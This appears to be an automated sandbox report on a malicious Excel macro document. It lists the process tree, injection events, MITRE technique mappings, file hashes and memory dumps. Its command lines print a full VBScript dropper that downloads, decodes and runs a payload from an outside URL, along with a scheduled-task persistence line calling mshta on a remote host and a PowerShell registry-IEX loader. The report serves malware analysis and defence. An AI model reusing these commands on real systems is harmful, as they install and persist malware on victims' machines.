Token: SeManageVolumePrivilege	2576	Powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

2020 EXCEL.EXE
2020 EXCEL.EXE
2020 EXCEL.EXE

pid	process
2020	EXCEL.EXE
2020	EXCEL.EXE
2020	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EXCEL.EXEmshta.execmd.exe

description	pid	process	target process
PID 2020 wrote to memory of 1528	2020	EXCEL.EXE	mshta.exe
PID 2020 wrote to memory of 1528	2020	EXCEL.EXE	mshta.exe
PID 2020 wrote to memory of 1528	2020	EXCEL.EXE	mshta.exe
PID 2020 wrote to memory of 1528	2020	EXCEL.EXE	mshta.exe
PID 1528 wrote to memory of 1752	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1752	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1752	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1752	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1732	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1732	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1732	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1732	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 316	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 316	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 316	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 316	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 908	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 908	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 908	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 908	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1652	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1652	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1652	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1652	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 916	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 916	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 916	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 916	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1792	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1792	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1792	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1792	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1704	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1704	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1704	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1704	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1016	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1016	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1016	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1016	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 1440	1528	mshta.exe	cmd.exe
PID 1528 wrote to memory of 1440	1528	mshta.exe	cmd.exe
PID 1528 wrote to memory of 1440	1528	mshta.exe	cmd.exe
PID 1528 wrote to memory of 1440	1528	mshta.exe	cmd.exe
PID 1440 wrote to memory of 2056	1440	cmd.exe	WScript.exe
PID 1440 wrote to memory of 2056	1440	cmd.exe	WScript.exe
PID 1440 wrote to memory of 2056	1440	cmd.exe	WScript.exe
PID 1440 wrote to memory of 2056	1440	cmd.exe	WScript.exe
PID 1528 wrote to memory of 2384	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2384	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2384	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2384	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2484	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2484	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2484	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2484	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2376	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2376	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2376	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2376	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2472	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2472	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2472	1528	mshta.exe	taskkill.exe
PID 1528 wrote to memory of 2472	1528	mshta.exe	taskkill.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\bb37e159_by_Libranalysis.xlsm
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\mshta.exe
"mshta""http://www.j.mp/jasidjalsdjlijlijasd"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1528

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im vbc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im csc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>hulalalMCROSOFT.vbs &@echo dim stream_obj >>hulalalMCROSOFT.vbs &@echo dim shell_obj >>hulalalMCROSOFT.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>hulalalMCROSOFT.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>hulalalMCROSOFT.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>hulalalMCROSOFT.vbs &@echo URL = "https://ia601506.us.archive.org/6/items/extobae64/newno.txt">>hulalalMCROSOFT.vbs &@echo http_obj.open "GET", URL, False >>hulalalMCROSOFT.vbs &@echo http_obj.send >>hulalalMCROSOFT.vbs &@echo stream_obj.type = 1 >>hulalalMCROSOFT.vbs &@echo stream_obj.open >>hulalalMCROSOFT.vbs &@echo stream_obj.write http_obj.responseBody >>hulalalMCROSOFT.vbs &@echo stream_obj.savetofile "C:\Users\Public\phutu.txt", 2 >>hulalalMCROSOFT.vbs &@echo Dim xxx >>hulalalMCROSOFT.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>hulalalMCROSOFT.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\phutu.txt", 1) >>hulalalMCROSOFT.vbs &@echo content = file.ReadAll >>hulalalMCROSOFT.vbs &@echo content = StrReverse(content) >>hulalalMCROSOFT.vbs &@echo Dim fso >>hulalalMCROSOFT.vbs &@echo Dim fdsafdsa >>hulalalMCROSOFT.vbs &@echo Dim oNode, fdsaa >>hulalalMCROSOFT.vbs &@echo Const adTypeBinary = 1 >>hulalalMCROSOFT.vbs &@echo Const adSaveCreateOverWrite = 2 >>hulalalMCROSOFT.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>hulalalMCROSOFT.vbs &@echo oNode.dataType = "bin.base64">>hulalalMCROSOFT.vbs &@echo oNode.Text = content >>hulalalMCROSOFT.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>hulalalMCROSOFT.vbs &@echo fdsaa.Type = adTypeBinary >>hulalalMCROSOFT.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\lulupupugugugagachuchui.txt") >>hulalalMCROSOFT.vbs &@echo LocalFile = tempdir >>hulalalMCROSOFT.vbs &@echo fdsaa.Open >>hulalalMCROSOFT.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>hulalalMCROSOFT.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>hulalalMCROSOFT.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>hulalalMCROSOFT.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>hulalalMCROSOFT.vbs &@echo If (fso.FileExists(LocalFile)) Then >>hulalalMCROSOFT.vbs &@echo fdsafdsa.Exec (LocalFile) >>hulalalMCROSOFT.vbs &@echo End If >>hulalalMCROSOFT.vbs& hulalalMCROSOFT.vbs &dEl hulalalMCROSOFT.vbs
3⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\hulalalMCROSOFT.vbs"
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
PID:2056

C:\Users\Public\lulupupugugugagachuchui.txt
C:\Users\Public\lulupupugugugagachuchui.txt
5⤵
- Executes dropped EXE
PID:2200

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im csc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im jsc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2436

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im InstallUtil.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regbrowsers
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im vbc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im jsc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CasPol.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_compiler.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegAsm.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im aspnet_regiis.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cvtres.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im msbuild.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im RegSvcs.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta""\""http://1230948%[email protected]/p/50.html\"
3⤵
- Creates scheduled task(s)
PID:2692

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -noexit ((gp HKCU:\Software).Phuphurupulugugu)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:1340

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:1752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:1716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:2604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
PID:976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
2⤵
- Drops startup file
PID:2584

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
3fdd81590cb4697dcb08aeba256f231e

SHA1
6bdb41ab2f35f000d45301d3c12517428fc002f5

SHA256
3d274a07acbdad31b172c8598ba8eb648115ee406c77d29c4d03c8e02bc6efc9

SHA512
d4c3c032ca22ba4043442f849358e18ac56a8110926c02173ff38d8a9a3606aff2fa41199a169d1f72c676d41ddbb04d633c6dd9c222e6fe042ae0a5d9a7726d

Download Submit
C:\Users\Public\hulalalMCROSOFT.vbs
MD5
048ebd17bb3df16f858bca5d4f78e20d

SHA1
9abd3a686392833edff2594c8d916992392cc48a

SHA256
2d57020695624dee4cf6a9043f10d95a53b755be6cf76c84aa992ef4f6948fc6

SHA512
5924356edbf646762c265d1cc7ad0541084dd5d3c14c5fc87c82bc7992233fb315df0462748dfde00e30d55d0f9a9ce7e2ee70bd21243cb27c21fc828c079d00

Download Submit
C:\Users\Public\lulupupugugugagachuchui.txt
MD5
c2ac3f940b60352931a31446a17525b1

SHA1
dcb39fd6962b8263fcd7c4cfd1187c224c654943

SHA256
64246eafb3187a5d814a9c1b55b61beda376eb2f3e8ec2c42988a1fafe0d5e6f

SHA512
e8ed300e95ddcec8539a6203d01aee8484ec82978931c90184039f5369f8bd9a4169dbece91bd5562ec736d01bf0f2252a1f4a7f1de9c7844ffb840acd0cb291

Download Submit
C:\Users\Public\lulupupugugugagachuchui.txt
MD5
c2ac3f940b60352931a31446a17525b1

SHA1
dcb39fd6962b8263fcd7c4cfd1187c224c654943

SHA256
64246eafb3187a5d814a9c1b55b61beda376eb2f3e8ec2c42988a1fafe0d5e6f

SHA512
e8ed300e95ddcec8539a6203d01aee8484ec82978931c90184039f5369f8bd9a4169dbece91bd5562ec736d01bf0f2252a1f4a7f1de9c7844ffb840acd0cb291

Download Submit
\Users\Public\lulupupugugugagachuchui.txt
MD5
c2ac3f940b60352931a31446a17525b1

SHA1
dcb39fd6962b8263fcd7c4cfd1187c224c654943

SHA256
64246eafb3187a5d814a9c1b55b61beda376eb2f3e8ec2c42988a1fafe0d5e6f

SHA512
e8ed300e95ddcec8539a6203d01aee8484ec82978931c90184039f5369f8bd9a4169dbece91bd5562ec736d01bf0f2252a1f4a7f1de9c7844ffb840acd0cb291

Download Submit
memory/316-68-0x0000000000000000-mapping.dmp

Download
memory/908-69-0x0000000000000000-mapping.dmp

Download
memory/916-71-0x0000000000000000-mapping.dmp

Download
memory/1016-74-0x0000000000000000-mapping.dmp

Download
memory/1440-75-0x0000000000000000-mapping.dmp

Download
memory/1440-76-0x0000000076281000-0x0000000076283000-memory.dmp

Filesize
8KB

Download
memory/1528-63-0x0000000000000000-mapping.dmp

Download
memory/1652-70-0x0000000000000000-mapping.dmp

Download
memory/1704-73-0x0000000000000000-mapping.dmp

Download
memory/1732-67-0x0000000000000000-mapping.dmp

Download
memory/1752-66-0x0000000000000000-mapping.dmp

Download
memory/1792-72-0x0000000000000000-mapping.dmp

Download
memory/2020-60-0x000000002FF31000-0x000000002FF34000-memory.dmp

Filesize
12KB

Download
memory/2020-61-0x0000000071941000-0x0000000071943000-memory.dmp

Filesize
8KB

Download
memory/2020-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2020-64-0x0000000005A10000-0x0000000005A12000-memory.dmp

Filesize
8KB

Download
memory/2020-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2056-77-0x0000000000000000-mapping.dmp

Download
memory/2200-112-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/2200-114-0x0000000000510000-0x000000000051E000-memory.dmp

Filesize
56KB

Download
memory/2200-121-0x0000000004330000-0x0000000004331000-memory.dmp

Filesize
4KB

Download
memory/2200-109-0x0000000000000000-mapping.dmp

Download
memory/2348-90-0x0000000000000000-mapping.dmp

Download
memory/2376-82-0x0000000000000000-mapping.dmp

Download
memory/2384-80-0x0000000000000000-mapping.dmp

Download
memory/2392-85-0x0000000000000000-mapping.dmp

Download
memory/2408-92-0x0000000000000000-mapping.dmp

Download
memory/2420-101-0x0000000000000000-mapping.dmp

Download
memory/2428-84-0x0000000000000000-mapping.dmp

Download
memory/2436-86-0x0000000000000000-mapping.dmp

Download
memory/2444-88-0x0000000000000000-mapping.dmp

Download
memory/2460-87-0x0000000000000000-mapping.dmp

Download
memory/2472-83-0x0000000000000000-mapping.dmp

Download
memory/2484-81-0x0000000000000000-mapping.dmp

Download
memory/2492-89-0x0000000000000000-mapping.dmp

Download
memory/2500-93-0x0000000000000000-mapping.dmp

Download
memory/2512-91-0x0000000000000000-mapping.dmp

Download
memory/2520-94-0x0000000000000000-mapping.dmp

Download
memory/2528-95-0x0000000000000000-mapping.dmp

Download
memory/2576-102-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/2576-98-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/2576-107-0x000000001C4A0000-0x000000001C4A1000-memory.dmp

Filesize
4KB

Download
memory/2576-105-0x00000000023B0000-0x00000000023B1000-memory.dmp

Filesize
4KB

Download
memory/2576-104-0x000000001AB14000-0x000000001AB16000-memory.dmp

Filesize
8KB

Download
memory/2576-103-0x000000001AB10000-0x000000001AB12000-memory.dmp

Filesize
8KB

Download
memory/2576-97-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

Filesize
8KB

Download
memory/2576-106-0x000000001B660000-0x000000001B661000-memory.dmp

Filesize
4KB

Download
memory/2576-99-0x000000001AB90000-0x000000001AB91000-memory.dmp

Filesize
4KB

Download
memory/2576-115-0x00000000026C0000-0x00000000026CD000-memory.dmp

Filesize
52KB

Download
memory/2584-117-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2584-118-0x000000000040838E-mapping.dmp

Download
memory/2584-119-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2584-122-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/2692-96-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads